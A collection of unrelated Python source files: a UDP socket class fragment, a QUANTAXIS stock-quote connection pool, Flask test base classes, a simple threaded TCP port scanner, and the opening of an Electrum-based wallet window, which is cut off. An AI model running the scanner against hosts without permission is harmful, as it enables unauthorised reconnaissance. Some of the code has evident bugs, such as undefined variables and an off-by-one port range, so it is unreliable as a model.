def __init__(self, modem, tx_max=0, rx_max=0, sleep_time=0.2, desired_queue_length=2, diagnostic_poll_time=0, debug=False):
"""
Initialize WlUDPSocket. Use "send" to send datagrams and "receive" to get received datagrams.
tx_max sets the number of datagrams to allow in the send queue
rx_max sets the number of datagrams to allow in the receive queue
sleep_time sets the number of seconds before checking if the modem needs more data
debug can be set to True to enable mode debug output
"""
WlUDPBase.__init__(self, modem, diagnostic_poll_time=diagnostic_poll_time, desired_queue_length=desired_queue_length, debug=debug)
self.sleep_time = sleep_time
self._tx_queue = queue.Queue(maxsize=tx_max)
self._rx_queue = queue.Queue(maxsize=rx_max)
self.run_event = threading.Event()
self.run_event.set()
self.worker = threading.Thread(target=self.run, args=())
self.worker.daemon = True
# Start thread
self.worker.start()
def send(self, data, block=False):
"""
Add datagram for transmission
Returns True if successful, False if queue is ful
"""
try:
self._tx_queue.put(data, block=block)
return True
except queue.Full:
return False
def send_qsize(self):
"""
Return the number of datagrams which are queued but have not started
transmission yet.
"""
return self._tx_queue.qsize()
def send_flush(self):
"""
Flush send queue
"""
try:
# Flush send queue
while True:
self._tx_queue.get(block=False)
except queue.Empty:
pass
def receive(self, block=False):
""" Get datagram if one is available.
If block is True it waits until a datagram is available and returns.
If queue is full, return None
"""
try:
return self._rx_queue.get(block=block)
except queue.Empty:
return None
def receive_qsize(self):
"""
Return the number of datagrams which have been receved but not read yet.
"""
return self._rx_queue.qsize()
def receive_flush(self):
"""
Flush receive queue
"""
try:
# Flush receive queue
while True:
self._rx_queue.get(block=False)
except queue.Empty:
pass
def _fill_tx_buf(self):
try:
# Get data
data = self._tx_queue.get_nowait()
# Frame it
framed = frame(data)
# Add it to the buffer
self._tx_buf.extend(framed)
except queue.Empty:
# No more data available at this time
pass
def _fill_rx_buf(self, data):
# Got some actual data
try:
self._rx_queue.put_nowait(data)
return True
except queue.Full:
# Queue full, drop the packet
return False
def run(self):
""" Worker thread main function. You do not need to call this function, it is run automatically """
while self.run_event.is_set():
self._run_send()
self._run_receive()
time.sleep(self.sleep_time)
def stop(self):
""" Stop worker thread """
self.run_event.clear()
self.worker.join()
|
QATdx_adv.py
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime
import queue
import time
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, Timer
import pandas as pd
from pytdx.hq import TdxHq_API
from QUANTAXIS.QAUtil.QADate_trade import QA_util_if_tradetime
from QUANTAXIS.QAUtil.QASetting import DATABASE, info_ip_list
from QUANTAXIS.QAUtil.QASql import QA_util_sql_mongo_sort_ASCENDING
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
"""
准备做一个多连接的连接池执行器Executor
当持续获取数据/批量数据的时候,可以减小服务器的压力,并且可以更快的进行并行处理
"""
class QA_Tdx_Executor():
def __init__(self, thread_num=2, *args, **kwargs):
self.thread_num = thread_num
self._queue = queue.Queue(maxsize=200)
self.api_no_connection = TdxHq_API()
self._api_worker = Thread(
target=self.api_worker, args=(), name='API Worker')
self._api_worker.start()
self.executor = ThreadPoolExecutor(self.thread_num)
def __getattr__(self, item):
try:
api = self.get_available()
func = api.__getattribute__(item)
def wrapper(*args, **kwargs):
res = self.executor.submit(func, *args, **kwargs)
self._queue.put(api)
return res
return wrapper
except:
return self.__getattr__(item)
def _queue_clean(self):
self._queue = queue.Queue(maxsize=200)
def _test_speed(self, ip, port=7709):
api = TdxHq_API(raise_exception=True, auto_retry=False)
_time = datetime.datetime.now()
try:
with api.connect(ip, port, time_out=0.05):
if len(api.get_security_list(0, 1)) > 800:
return (datetime.datetime.now() - _time).total_seconds()
else:
return datetime.timedelta(9, 9, 0).total_seconds()
except Exception as e:
return datetime.timedelta(9, 9, 0).total_seconds()
def get_market(self, code):
code = str(code)
if code[0] in ['5', '6', '9'] or code[:3] in ["009", "126", "110", "201", "202", "203", "204"]:
return 1
return 0
def get_frequence(self, frequence):
if frequence in ['day', 'd', 'D', 'DAY', 'Day']:
frequence = 9
elif frequence in ['w', 'W', 'Week', 'week']:
frequence = 5
elif frequence in ['month', 'M', 'm', 'Month']:
frequence = 6
elif frequence in ['Q', 'Quarter', 'q']:
frequence = 10
elif frequence in ['y', 'Y', 'year', 'Year']:
frequence = 11
elif str(frequence) in ['5', '5m', '5min', 'five']:
frequence = 0
elif str(frequence) in ['1', '1m', '1min', 'one']:
frequence = 8
elif str(frequence) in ['15', '15m', '15min', 'fifteen']:
frequence = 1
elif str(frequence) in ['30', '30m', '30min', 'half']:
frequence = 2
elif str(frequence) in ['60', '60m', '60min', '1h']:
frequence = 3
return frequence
@property
def ipsize(self):
return len(self._queue.qsize())
@property
def api(self):
return self.get_available()
def get_available(self):
if self._queue.empty() is False:
return self._queue.get_nowait()
else:
Timer(0, self.api_worker).start()
return self._queue.get()
def api_worker(self):
data = []
if self._queue.qsize() < 80:
for item in info_ip_list:
_sec = self._test_speed(item)
if _sec < 0.1:
try:
self._queue.put(TdxHq_API(heartbeat=False).connect(
ip=item, time_out=0.05))
except:
pass
else:
self._queue_clean()
Timer(0, self.api_worker).start()
Timer(300, self.api_worker).start()
def _singal_job(self, context, id_, time_out=0.5):
try:
_api = self.get_available()
__data = context.append(self.api_no_connection.to_df(_api.get_security_quotes(
[(self._select_market_code(x), x) for x in code[80 * id_:80 * (id_ + 1)]])))
__data['datetime'] = datetime.datetime.now()
self._queue.put(_api) # 加入注销
return __data
except:
return self.singal_job(context, id_)
def get_realtime(self, code):
context = pd.DataFrame()
code = [code] if type(code) is str else code
try:
for id_ in range(int(len(code) / 80) + 1):
context = self._singal_job(context, id_)
data = context[['datetime', 'last_close', 'code', 'open', 'high', 'low', 'price', 'cur_vol',
's_vol', 'b_vol', 'vol', 'ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]
data['datetime'] = data['datetime'].apply(lambda x: str(x))
return data.set_index('code', drop=False, inplace=False)
except:
return None
def get_realtime_concurrent(self, code):
code = [code] if type(code) is str else code
try:
data = {self.get_security_quotes([(self.get_market(
x), x) for x in code[80 * pos:80 * (pos + 1)]]) for pos in range(int(len(code) / 80) + 1)}
return (pd.concat([self.api_no_connection.to_df(i.result()) for i in data]), datetime.datetime.now())
except:
pass
def get_security_bar_concurrent(self, code, _type, lens):
try:
data = {self.get_security_bars(self.get_frequence(_type), self.get_market(
str(code)), str(code), 0, lens) for code in code}
return [i.result() for i in data]
except:
raise Exception
def _get_security_bars(self, context, code, _type, lens):
try:
_api = self.get_available()
for i in range(1, int(lens / 800) + 2):
context.extend(_api.get_security_bars(self.get_frequence(
_type), self.get_market(str(code)), str(code), (i - 1) * 800, 800))
print(context)
self._queue.put(_api)
return context
except Exception as e:
return self._get_security_bars(context, code, _type, lens)
def get_security_bar(self, code, _type, lens):
code = [code] if type(code) is str else code
context = []
try:
for item in code:
context = self._get_security_bars(context, item, _type, lens)
return context
except Exception as e:
raise e
def save_mongo(self, data, client=DATABASE):
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
database.insert_many(QA_util_to_json_from_pandas(data))
def get_bar():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor()
print(x._queue.qsize())
print(x.get_available())
for i in range(100000):
_time = datetime.datetime.now()
if QA_util_if_tradetime(_time): # 如果在交易时间
data = x.get_security_bar_concurrent(code, 'day', 1)
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(1)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(1)
def get_day_once():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
x = QA_Tdx_Executor()
return x.get_security_bar_concurrent(code, 'day', 1)
def bat():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor()
print(x._queue.qsize())
print(x.get_available())
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
print(database)
database.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
for i in range(100000):
_time = datetime.datetime.now()
if QA_util_if_tradetime(_time): # 如果在交易时间
data = x.get_realtime_concurrent(code)
data[0]['datetime'] = data[1]
x.save_mongo(data[0])
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(1)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(1)
if __name__ == '__main__':
import time
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
DATABASE.realtime.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
# print(len(code))
# x = QA_Tdx_Executor()
# print(x._queue.qsize())
# print(x.get_available())
# #data = x.get_security_bars(code[0], '15min', 20)
# # print(data)
# # for i in range(5):
# # print(x.get_realtime_concurrent(code))
# for i in range(100000):
# _time = datetime.datetime.now()
# if QA_util_if_tradetime(_time): # 如果在交易时间
# #data = x.get_realtime(code)
# data = x.get_realtime_concurrent(code)
# data[0]['datetime'] = data[1]
# x.save_mongo(data[0])
# # print(code[0])
# #data = x.get_security_bars(code, '15min', 20)
# # if data is not None:
# print(len(data[0]))
# # print(data)
# print('Time {}'.format((datetime.datetime.now() - _time).total_seconds()))
# time.sleep(1)
# print('Connection Pool NOW LEFT {} Available IP'.format(x._queue.qsize()))
# print('Program Last Time {}'.format(
# (datetime.datetime.now() - _time1).total_seconds()))
# # print(threading.enumerate())
# #
|
__init__.py
|
import os
# setup testing environment before anything imports app
os.environ["FLASK_ENV"] = "test"
from pmg import app
from pmg.models import db
from flask_testing import TestCase, LiveServerTestCase
import multiprocessing
import time
import urllib.request, urllib.error, urllib.parse
class PMGTestCase(TestCase):
def create_app(self):
return app
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
class PMGLiveServerTestCase(LiveServerTestCase):
def __call__(self, result=None):
"""
Does the required setup, doing it here means you don't have to
call super.setUp in subclasses.
"""
# Get the app
self.app = self.create_app()
self.port = self.app.config.get("LIVESERVER_PORT", 5000)
self.base_url = "http://pmg.test:5000/"
# We need to create a context in order for extensions to catch up
self._ctx = self.app.test_request_context()
self._ctx.push()
try:
self._spawn_live_server()
super(LiveServerTestCase, self).__call__(result)
finally:
self._post_teardown()
self._terminate_live_server()
def _spawn_live_server(self):
self._process = None
worker = lambda app, port: app.run(port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker, args=(self.app, self.port)
)
self._process.start()
# We must wait for the server to start listening, but give up
# after a specified maximum timeout
timeout = self.app.config.get("LIVESERVER_TIMEOUT", 5)
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise RuntimeError(
"Failed to start the server after %d seconds. " % timeout
)
if self._can_ping_server():
break
def create_app(self):
# https://stackoverflow.com/a/38529331/1305080
db.engine.dispose()
return app
def setUp(self):
db.create_all()
self.created_objects = []
def tearDown(self):
db.session.remove()
db.drop_all()
def make_request(self, path, user=None, **args):
"""
Make a request to the test app (optionally with a user session).
Args:
path: Endpoint to make the request to.
user: User to make the request as.
Keyword arguments are passed on to the test client
(https://werkzeug.palletsprojects.com/en/0.15.x/test/#testing-api).
"""
with self.app.test_client() as client:
with client.session_transaction() as session:
session["user_id"] = user.id if user else None
session["fresh"] = True
response = client.open(path, base_url=self.base_url, **args)
self.html = response.data.decode()
return response
def delete_created_objects(self):
for to_delete in self.created_objects:
db.session.delete(to_delete)
db.session.commit()
|
port_scanner.py
|
#!/usr/bin/env python
import socket #for socket scanning
from threading import * #for threading
import subprocess #to run the clean command and system exit
import sys
from datetime import datetime
#from queue import Queue #for threading (using queues)
import argparse #used for allowing command line switches
def main():
#Available command line options
parser = argparse.ArgumentParser(description='Allow command line arguments.')
parser.add_argument('-H',metavar='H', nargs="+", help="Target host to scan")
parser.add_argument('-p',metavar="p", nargs="+", help="List of Ports to Scan")
#all all available arguments to the 'args' variable
args = parser.parse_args()
#check what time the scan started
t1=datetime.now()
scanports = []
#parse the arguments for the ports and assign port numbers to be scanned
if "-" in args.p[0]:
temp = []
temp = args.p[0].replace('-',' ').split(' ')
temp[-1] = int(temp[-1])
for portnumber in range(1,temp[-1]):
scanports.append(portnumber);
elif len(args.p) > 1:
for portnumber in args.p:
scanports.append(portnumber);
else:
scanports = args.p
#assign the variables
for host in args.H:
#remoteServer = host
#remoteServerIP = socket.gethostbyname(remoteServer)
#print a banner with info on which host we are about to scan
print "-" * 60
print "Please wait, scanning remote host",host
string = "Scanning Ports "
for portInput in args.p:
string += portInput+" "
print string
print "-" * 60
#threaded port scanning
scan(host, scanports)
#Checking the time again
t2=datetime.now()
#Calculates the differences of time, to see how log it took to run the script
total = t2 - t1
#print information to screen
print "Scanning Completed in: ", total
def scan(host, ports):
#Using the range function to specify ports (scan ports between 1 and 1024)
#We also put in some error handling for catching errors
threads = []
for port in ports:
t = Thread(target=worker, args=(host,port))
threads.append(t)
t.start()
def worker(remoteServerIP, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((remoteServerIP, port))
if result == 0:
print "Port {}: \t Open".format(port)
sock.close()
except KeyboardInterrupt:
print "Canceled the scan."
sys.exit()
except socket.gaierror:
print "Hostname could not be resolved. Exiting."
sys.exit()
except socket.error:
print "Could not connect to server"
sys.exit()
if __name__ == "__main__":
subprocess.call('clear', shell=True) #clear the screen
main() #execute main code
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Baricoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
